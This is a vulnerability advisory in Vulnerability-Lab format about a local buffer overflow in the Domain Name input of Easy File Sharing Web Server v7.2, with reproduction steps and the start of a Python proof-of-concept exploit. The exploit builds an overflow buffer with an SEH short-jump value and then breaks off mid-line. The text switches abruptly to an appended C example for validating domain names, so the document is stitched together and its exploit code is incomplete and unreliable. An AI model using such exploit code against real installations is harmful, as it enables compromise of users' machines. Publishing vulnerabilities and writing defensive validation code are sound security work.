Document Title:
===============
Easy File Sharing WS v7.2 - (Domain Name) Buffer Overflow


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2154


Release Date:
=============
2018-10-04


Vulnerability Laboratory ID (VL-ID):
====================================
2154


Common Vulnerability Scoring System:
====================================
7.3


Vulnerability Class:
====================
Buffer Overflow


Current Estimated Price:
========================
3.000€ - 4.000€


Product & Service Introduction:
===============================
Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.). It can help you share files with your users, customers and partners. They can search for and download files from your computer or upload files from theirs. The files on your PC can be accessible from anywhere without special software. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It makes it easy for remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.

(Copy of the Homepage: http://www.sharing-file.com/ )


Abstract Advisory Information:
==============================
An independent vulnerability researcher of the laboratory discovered a local buffer overflow vulnerability in the Easy File Sharing Web Server v7.2.


Vulnerability Disclosure Timeline:
==================================
2018-10-02: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
EFS Software Inc
Product: Easy File Sharing Web Server 7.2


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Full Disclosure


Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server v7.2. The software vulnerability allows local attackers to overwrite the registers (e.g. eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.

The security vulnerability is classified as a classic buffer overflow issue. The vulnerability is located in the `Domain Name` input field of the Active Directory - Add Domain function.

The security risk of the local buffer overflow vulnerability is estimated as high with a CVSS score of 7.3. Exploitation of the buffer overflow vulnerability requires a low privilege restricted system user account without user interaction. Successful exploitation of the vulnerability results in an overwrite of the active registers and compromise of the computer system or process.

Vulnerable Module(s):
[+] Click User Account - Active Directory

Vulnerable Function(s):
[+] Add Domain

Vulnerable Input(s):
[+] Domain Name


Proof of Concept (PoC):
=======================
The local buffer overflow vulnerability can be exploited by local attackers with a restricted system user account without user interaction. For security demonstration or to reproduce the issue, follow the information and steps below.

1. Download and install Easy File Sharing Web Server v7.2
2. Run the Python script that will create a file (poc.txt)
3. Run the software "Click User Account -> Active Directory -> Add Domain -> Domain Name (Input)"
4. Paste the contents of the file (poc.txt) into the input "Domain Name" and click "OK"
Note: Now the calculator executes!
5. Successful reproduction of the local buffer overflow vulnerability!


PoC: Exploit (Python)
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 4059
a = "\xeb\x06\x90\x90"
b = pack("
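
For the `Domain Name` input described under Technical Details, the following added example (not the vendor's code and not part of the original advisory) shows one way an input handler can validate and bound a domain name before copying it into a fixed-size buffer. The function name `set_domain_name`, the helper `is_alnum_ascii`, the buffer sizes and the letters-digits-hyphen label rule are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

#define DOMAIN_MAX 253  /* maximum textual length of a DNS name */
#define LABEL_MAX   63  /* maximum length of a single label */

/* ASCII-only check, independent of the process locale. */
static int is_alnum_ascii(unsigned char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9');
}

/* Hypothetical handler: validate an untrusted domain name of src_len bytes
 * and copy it into dst (capacity dst_cap, including the terminator).
 * Returns 0 on success and -1 on rejection. On rejection dst is left as an
 * empty string, so a caller never sees partially copied input. */
int set_domain_name(char *dst, size_t dst_cap, const char *src, size_t src_len)
{
    size_t label_len = 0;

    if (dst == NULL || dst_cap == 0)
        return -1;
    dst[0] = '\0';

    /* Length is checked against both the protocol limit and the real
     * destination capacity before any byte is copied. */
    if (src == NULL || src_len == 0 || src_len > DOMAIN_MAX || src_len >= dst_cap)
        return -1;

    for (size_t i = 0; i < src_len; i++) {
        unsigned char c = (unsigned char)src[i];
        if (c == '.') {
            if (label_len == 0 || src[i - 1] == '-')
                return -1;          /* empty label or label ending in '-' */
            label_len = 0;
        } else if (is_alnum_ascii(c) || (c == '-' && label_len > 0)) {
            if (++label_len > LABEL_MAX)
                return -1;          /* over-long label */
        } else {
            return -1;              /* NUL, control, or non-ASCII byte */
        }
    }
    if (label_len == 0 || src[src_len - 1] == '-')
        return -1;                  /* trailing dot or trailing hyphen */

    memcpy(dst, src, src_len);      /* src_len < dst_cap was checked above */
    dst[src_len] = '\0';
    return 0;
}
```

The caller passes the length reported by the input control rather than relying on a terminator, so an oversized paste is rejected by the length check before the copy is reached.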